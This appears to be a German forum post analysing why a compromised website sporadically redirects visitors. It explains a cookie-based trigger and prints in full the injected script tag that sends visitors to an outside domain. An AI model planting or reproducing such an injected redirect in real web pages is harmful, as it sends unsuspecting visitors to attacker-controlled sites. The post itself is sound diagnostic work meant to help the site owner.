Ja, es tritt wieder auf.
Eine Netzwerkanalyse zeigt auch, warum die Umleitungen nur sprodaisch auftreten:
Der Schadcode auf dem Server setzt ein Cookie 'a777d' mit einer Gültigkeit von ~10 Stunden. Hieran identifiziert der Schadcode offenbar, ob der Besucher schon einmal umgeleitet wurde oder nicht. Wenn das Cookie nicht vorhanden ist, dann wird man umgeleitet, ansonsten erst nach Ablauf des Cookies wieder. Damit ist auch das Phänomen erklärt, dass der zweite Aufruf nach Umleitung von
www.dungenonslayers.net funktioniert.
Die Umleitung kommt dadurch zustande, dass in der ersten Zeile der HTML-Antwort folgendes Tag von Schadcode untergeschoben wird, falls das Cookie nicht vorhanden ist:
<script>window.location.replace("http://someupon.tk/index/?2601510941471");window.location.href = "http://someupon.tk/index/?2601510941471";</script><br /> Die Links der Weiterleitungen variieren.
Das Verhalten lässt darauf schließen, dass sich der Unhold in einer (zentralen?) php-Datei oder Funktion, eingenistet hat.
CK, vielleicht hilft dir das etwas weiter?